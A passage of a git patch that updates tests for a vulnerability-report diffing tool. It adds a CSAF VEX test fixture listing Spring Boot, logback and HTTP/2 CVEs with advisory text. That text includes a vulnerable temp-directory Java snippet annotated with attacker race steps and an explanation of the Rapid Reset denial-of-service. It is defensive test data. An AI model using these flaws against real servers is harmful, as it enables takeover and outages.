From 15faf3722e53a4f1885130624ad78e867d6c1354 Mon Sep 17 00:00:00 2001
From: Caroline Russell <caroline@appthreat.dev>
Date: Mon, 7 Oct 2024 04:07:48 -0400
Subject: [PATCH] Updating and improving tests.

Signed-off-by: Caroline Russell <caroline@appthreat.dev>
---
 test/csaf_3.json              |   1 +
 test/csaf_4.json              |   1 +
 test/test_bom_diff.py         |   6 +-
 test/test_csaf_diff.py        | 410 ++++++++++++++++------------------
 test/test_custom_json_diff.py |  16 +-
 test/test_data.json           |   2 +-
 6 files changed, 218 insertions(+), 218 deletions(-)
 create mode 100644 test/csaf_3.json
 create mode 100644 test/csaf_4.json

diff --git a/test/csaf_3.json b/test/csaf_3.json
new file mode 100644
index 0000000..3d1583a
--- /dev/null
+++ b/test/csaf_3.json
@@ -0,0 +1 @@
+{"document":{"aggregate_severity":{"text":"Critical"},"category":"csaf_vex","csaf_version":"2.0","lang":"en","notes":[{"category":"legal_disclaimer","text":"Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}],"publisher":{"category":"vendor","contact_details":"vendor@mcvendorson.com","name":"Vendor McVendorson","namespace":"https://appthreat.com"},"references":[{"summary":"website","url":"http://projects.spring.io/spring-boot/java-sec-code/"},{"summary":"vcs","url":"https://github.com/spring-projects/spring-boot/spring-boot-starter-parent/java-sec-code"}],"title":"Your Title","tracking":{"current_release_date":"2024-10-01T02:41:17","id":"2024-10-01T02:41:17_v1","initial_release_date":"2024-10-01T02:41:17","revision_history":[],"status":"draft","version":"1"}},"product_tree":{"full_product_names":[{"name":"java-sec-code","product_id":"java-sec-code:1.0.0","product_identification_helper":{"purl":"pkg:maven/sec/java-sec-code@1.0.0?type=jar"}}]},"vulnerabilities":[{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22965"]}],"cve":"CVE-2022-22965","cwe":{"id":"74","name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component"},"discovery_date":"2022-03-31T18:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-22965"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2022-0005"},{"system_name":"Cisco Advisory","text":"cisco-sa-java-spring-rce-Zx9GUc67"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22965"},{"system_name":"Siemens Advisory","text":"ssa-254054"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Remote Code Execution in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Remote Code Execution in Spring Framework Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`.   ## Impact  A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.  These are the prerequisites for the exploit: - JDK 9 or higher - Apache Tomcat as the Servlet container - Packaged as WAR - `spring-webmvc` or `spring-webflux` dependency  ## Patches  - Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE) - Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)  ## Workarounds  For those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.  To apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux)."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-starter-web@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html"},{"summary":"Siemens Advisory ssa-254054","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Sonicwall Advisory SNWLID-2022-0005","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005"},{"summary":"Vmware Advisory cve-2022-22965","url":"https://tanzu.vmware.com/security/cve-2022-22965"},{"summary":"Cisco Advisory cisco-sa-java-spring-rce-Zx9GUc67","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot-starter-web@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]}],"title":"CVE-2022-22965/pkg:maven/org.springframework.boot/spring-boot-starter-web@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-27772"]}],"cve":"CVE-2022-27772","cwe":{"id":"377","name":"Insecure Temporary File"},"discovery_date":"2022-07-11T20:59:02","ids":[{"system_name":"CVE Record","text":"CVE-2022-27772"},{"system_name":"GitHub Advisory","text":"GHSA-cm59-pr5q-cw85"}],"notes":[{"audience":"developers","category":"other","text":"Creation of Temporary File in Directory with Insecure Permissions","title":"Additional CWE: 379"},{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in org.springframework.boot:spring-boot"},{"category":"details","details":"Vulnerability Details","text":"# Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in org.springframework.boot:spring-boot spring-boot versions prior to version `v2.2.11.RELEASE` was vulnerable to temporary directory hijacking. This vulnerability impacted the `org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir` method.  The vulnerable method is used to create a work directory for embedded web servers such as Tomcat and Jetty. The directory contains configuration files, JSP/class files, etc. If a local attacker got the permission to write in this directory, they could completely take over the application (ie. local privilege escalation).  #### Impact Location  This vulnerability impacted the following source location:  ```java  /**   * Return the absolute temp dir for given web server.   * @param prefix server name   * @return the temp dir for given server.   */  protected final File createTempDir(String prefix) {   try {    File tempDir = File.createTempFile(prefix + \".\", \".\" + getPort());    tempDir.delete();    tempDir.mkdir();    tempDir.deleteOnExit();    return tempDir;   } ``` \\- https://github.com/spring-projects/spring-boot/blob/ce70e7d768977242a8ea6f93188388f273be5851/spring-boot-project/spring-boot/src/main/java/org/springframework/boot/web/server/AbstractConfigurableWebServerFactory.java#L165-L177  This vulnerability exists because `File.mkdir` returns `false` when it fails to create a directory, it does not throw an exception. As such, the following race condition exists:  ```java File tmpDir =File.createTempFile(prefix + \".\", \".\" + getPort()); // Attacker knows the full path of the file that will be generated // delete the file that was created tmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty. // and make a directory of the same name // SECURITY VULNERABILITY: Race Condition! - Attacker beats java code and now owns this directory tmpDir.mkdirs(); // This method returns 'false' because it was unable to create the directory. No exception is thrown. // Attacker can write any new files to this directory that they wish. // Attacker can read any files created by this process. ```  ### Prerequisites  This vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.  ### Patches  This vulnerability was inadvertently fixed as a part of this patch: https://github.com/spring-projects/spring-boot/commit/667ccdae84822072f9ea1a27ed5c77964c71002d  This vulnerability is patched in versions `v2.2.11.RELEASE` or later.  ### Workarounds  Setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot@vers:maven/>=1.0.0.RELEASE|<=2.2.9.RELEASE"]},"references":[{"summary":"GitHub Advisory GHSA-cm59-pr5q-cw85","url":"https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-cm59-pr5q-cw85"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-27772"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-27772"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.9,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"CHANGED","temporalScore":7.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot@vers:maven/>=1.0.0.RELEASE|<=2.2.9.RELEASE"]}],"title":"CVE-2022-27772/pkg:maven/org.springframework.boot/spring-boot@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-20883"]}],"cve":"CVE-2023-20883","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-05-26T18:30:21","ids":[{"system_name":"CVE Record","text":"CVE-2023-20883"},{"system_name":"NetApp Advisory","text":"ntap-20230703-0008"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Boot Welcome Page Denial of Service"},{"category":"details","details":"Vulnerability Details","text":"# Spring Boot Welcome Page Denial of Service In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache.  Specifically, an application is vulnerable if all of the conditions are true:  * The application has Spring MVC auto-configuration enabled. This is the case by default if Spring MVC is on the classpath. * The application makes use of Spring Boot's welcome page support, either static or templated. * Your application is deployed behind a proxy which caches 404 responses.  Your application is NOT vulnerable if any of the following are true:  * Spring MVC auto-configuration is disabled. This is true if WebMvcAutoConfiguration is explicitly excluded, if Spring MVC is not on the classpath, or if spring.main.web-application-type is set to a value other than SERVLET. * The application does not use Spring Boot's welcome page support. * You do not have a proxy which caches 404 responses.   Affected Spring Products and Versions  Spring Boot  3.0.0 to 3.0.6 2.7.0 to 2.7.11 2.6.0 to 2.6.14 2.5.0 to 2.5.14  Older, unsupported versions are also affected Mitigation  Users of affected versions should apply the following mitigations:  * 3.0.x users should upgrade to 3.0.7+ * 2.7.x users should upgrade to 2.7.12+ * 2.6.x users should upgrade to 2.6.15+ * 2.5.x users should upgrade to 2.5.15+  Users of older, unsupported versions should upgrade to 3.0.7+ or 2.7.12+.  Workarounds: configure the reverse proxy not to cache 404 responses and/or not to cache responses to requests to the root (/) of the application."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-autoconfigure@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20883"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20883"},{"summary":"NetApp Advisory ntap-20230703-0008","url":"https://security.netapp.com/advisory/ntap-20230703-0008"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20883"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot-autoconfigure@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]}],"title":"CVE-2023-20883/pkg:maven/org.springframework.boot/spring-boot-autoconfigure@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-6378"]}],"cve":"CVE-2023-6378","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2023-11-29T12:30:16","ids":[{"system_name":"CVE Record","text":"CVE-2023-6378"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"logback serialization vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# logback serialization vulnerability A serialization vulnerability in logback receiver component part of logback allows an attacker to mount a Denial-Of-Service attack by sending poisoned data.  This is only exploitable if logback receiver component is deployed. See https://logback.qos.ch/manual/receivers.html"}],"product_status":{"known_affected":["ch.qos.logback/logback-classic@vers:maven/>=0.2.5|<=1.2.12"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-6378"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-6378"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.1,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.1,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":7.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H","version":"3.1"},"products":["ch.qos.logback/logback-classic@vers:maven/>=0.2.5|<=1.2.12"]}],"title":"CVE-2023-6378/pkg:maven/ch.qos.logback/logback-classic@1.1.9?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-42550"]}],"cve":"CVE-2021-42550","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-17T20:00:50","ids":[{"system_name":"CVE Record","text":"CVE-2021-42550"},{"system_name":"NetApp Advisory","text":"ntap-20211229-0001"},{"system_name":"Siemens Advisory","text":"ssa-371761"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in logback"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in logback In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers."}],"product_status":{"known_affected":["ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"summary":"Siemens Advisory ssa-371761","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-371761.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42550"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42550"},{"summary":"NetApp Advisory ntap-20211229-0001","url":"https://security.netapp.com/advisory/ntap-20211229-0001"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"]}],"title":"CVE-2021-42550/pkg:maven/ch.qos.logback/logback-core@1.1.9?type=jar"},{"cve":"CVE-2023-44487","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-10-10T21:28:24","ids":[{"system_name":"Microsoft Advisory","text":"2"},{"system_name":"Hashicorp Advisory","text":"59715"},{"system_name":"Swift Advisory","text":"67764"},{"system_name":"Amazon Advisory","text":"AWS-2023-011"},{"system_name":"CVE Record","text":"CVE-2023-44487"},{"system_name":"GitHub Advisory","text":"GHSA-2m7v-gc89-fjqf"},{"system_name":"GitHub Advisory","text":"GHSA-qppj-fm5r-hxr3"},{"system_name":"GitHub Advisory","text":"GHSA-vx74-f528-fxqg"},{"system_name":"GitHub Advisory","text":"GHSA-xpw8-rcwv-8f8p"},{"system_name":"Phoronix Advisory","text":"HTTP2-Rapid-Reset-Attack"},{"system_name":"F5 Advisory","text":"K000137106"},{"system_name":"Freebsd Advisory","text":"commit"},{"system_name":"Red Hat Advisory","text":"cve-2023-44487"},{"system_name":"Qualys Advisory","text":"cve-2023-44487-http-2-rapid-reset-attack"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"Debian Advisory","text":"dsa-5540"},{"system_name":"Debian Advisory","text":"dsa-5549"},{"system_name":"Debian Advisory","text":"dsa-5558"},{"system_name":"Debian Advisory","text":"dsa-5570"},{"system_name":"Gentoo Advisory","text":"glsa-202311-09"},{"system_name":"Google Advisory","text":"google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"},{"system_name":"Haproxy Advisory","text":"haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487"},{"system_name":"Arstechnica Advisory","text":"how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size"},{"system_name":"Google Advisory","text":"how-it-works-the-novel-http2-rapid-reset-ddos-attack"},{"system_name":"Nginx Advisory","text":"http-2-rapid-reset-attack-impacting-f5-nginx-products"},{"system_name":"Openssf Advisory","text":"http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response"},{"system_name":"Theregister Advisory","text":"http2_rapid_reset_zeroday"},{"system_name":"Seanmonstar Advisory","text":"hyper-http2-rapid-reset-unaffected"},{"system_name":"Darkreading Advisory","text":"internet-wide-zero-day-bug-fuels-largest-ever-ddos-event"},{"system_name":"Eclipse Advisory","text":"msg00181"},{"system_name":"Netlify Advisory","text":"netlify-successfully-mitigates-cve-2023-44487"},{"system_name":"Bleepingcomputer Advisory","text":"new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records"},{"system_name":"NetApp Advisory","text":"ntap-20231016-0001"},{"system_name":"NetApp Advisory","text":"ntap-20240426-0007"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0007"},{"system_name":"Proxmox Bugzilla","text":"proxmox-bugzilla-4988"},{"system_name":"Litespeedtech Advisory","text":"rapid-reset-http-2-vulnerablilty"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-2242803"},{"system_name":"Suse Bugzilla","text":"suse-bugzilla-1216123"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"HTTP/2 Stream Cancellation Attack"},{"category":"details","details":"Vulnerability Details","text":"# HTTP/2 Stream Cancellation Attack ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.  Abuse of this feature is called a Rapid Reset attack because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open.   The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately.  The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth.  In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.  Multiple software artifacts implementing HTTP/2 are affected. This advisory was originally ingested from the `swift-nio-http2` repo advisory and their original conent follows.  ## swift-nio-http2 specific advisory swift-nio-http2 is vulnerable to a denial-of-service vulnerability in which a malicious client can create and then reset a large number of HTTP/2 streams in a short period of time. This causes swift-nio-http2 to commit to a large amount of expensive work which it then throws away, including creating entirely new `Channel`s to serve the traffic. This can easily overwhelm an `EventLoop` and prevent it from making forward progress.  swift-nio-http2 1.28 contains a remediation for this issue that applies reset counter using a sliding window. This constrains the number of stream resets that may occur in a given window of time. Clients violating this limit will have their connections torn down. This allows clients to continue to cancel streams for legitimate reasons, while constraining malicious actors.  ## Related CVE(s) BIT-apisix-2023-44487, BIT-aspnet-core-2023-44487, BIT-contour-2023-44487, BIT-dotnet-2023-44487, BIT-dotnet-sdk-2023-44487, BIT-envoy-2023-44487, BIT-golang-2023-44487, BIT-jenkins-2023-44487, BIT-kong-2023-44487, BIT-nginx-2023-44487, BIT-nginx-ingress-controller-2023-44487, BIT-node-2023-44487, BIT-solr-2023-44487, BIT-tomcat-2023-44487, BIT-varnish-2023-44487, CVE-2023-44487"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/13/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/13/9"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/18/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/18/8"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/19/6"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/20/8"},{"summary":"Red Hat Advisory cve-2023-44487","url":"https://access.redhat.com/security/cve/cve-2023-44487"},{"summary":"Arstechnica Advisory how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size","url":"https://arstechnica.com/security/2023/10/how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size"},{"summary":"Amazon Advisory AWS-2023-011","url":"https://aws.amazon.com/security/security-bulletins/AWS-2023-011"},{"summary":"Litespeedtech Advisory rapid-reset-http-2-vulnerablilty","url":"https://blog.litespeedtech.com/2023/10/11/rapid-reset-http-2-vulnerablilty"},{"summary":"Qualys Advisory cve-2023-44487-http-2-rapid-reset-attack","url":"https://blog.qualys.com/vulnerabilities-threat-research/2023/10/10/cve-2023-44487-http-2-rapid-reset-attack"},{"summary":"Cve 2023","url":"https://blog.vespa.ai/cve-2023-44487"},{"summary":"Proxmox Bugzilla","url":"https://bugzilla.proxmox.com/show_bug.cgi?id=4988"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=2242803"},{"summary":"Suse Bugzilla","url":"https://bugzilla.suse.com/show_bug.cgi?id=1216123"},{"summary":"Freebsd Advisory","url":"https://cgit.freebsd.org/ports/commit/?id=c64c329c2c1752f46b73e3e6ce9f4329be6629f9"},{"summary":"Google Advisory google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps","url":"https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"},{"summary":"Google Advisory how-it-works-the-novel-http2-rapid-reset-ddos-attack","url":"https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack"},{"summary":"Hashicorp Advisory 59715","url":"https://discuss.hashicorp.com/t/hcsec-2023-32-vault-consul-and-boundary-affected-by-http-2-rapid-reset-denial-of-service-vulnerability-cve-2023-44487/59715"},{"summary":"Swift Advisory 67764","url":"https://forums.swift.org/t/swift-nio-http2-security-update-cve-2023-44487-http-2-dos/67764"},{"summary":"GitHub Advisory GHSA-qppj-fm5r-hxr3","url":"https://github.com/advisories/GHSA-qppj-fm5r-hxr3"},{"summary":"GitHub Advisory GHSA-vx74-f528-fxqg","url":"https://github.com/advisories/GHSA-vx74-f528-fxqg"},{"summary":"GitHub Advisory GHSA-xpw8-rcwv-8f8p","url":"https://github.com/advisories/GHSA-xpw8-rcwv-8f8p"},{"summary":"GitHub Advisory GHSA-qppj-fm5r-hxr3","url":"https://github.com/apple/swift-nio-http2/security/advisories/GHSA-qppj-fm5r-hxr3"},{"summary":"GitHub Advisory GHSA-2m7v-gc89-fjqf","url":"https://github.com/h2o/h2o/security/advisories/GHSA-2m7v-gc89-fjqf"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo/m/UDd7VKQuAAAJ"},{"summary":"Cve 2023","url":"https://linkerd.io/2023/10/12/linkerd-cve-2023-44487"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/5py8h42mxfsn8l1wy6o41xwhsjlsd87q"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00023.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00024.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00045.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00047.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/11/msg00001.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/11/msg00012.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MBEPPC36UBVOZZNAXFHKLFGSLCMN5LI"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5"},{"summary":"Fedora Project Mailing 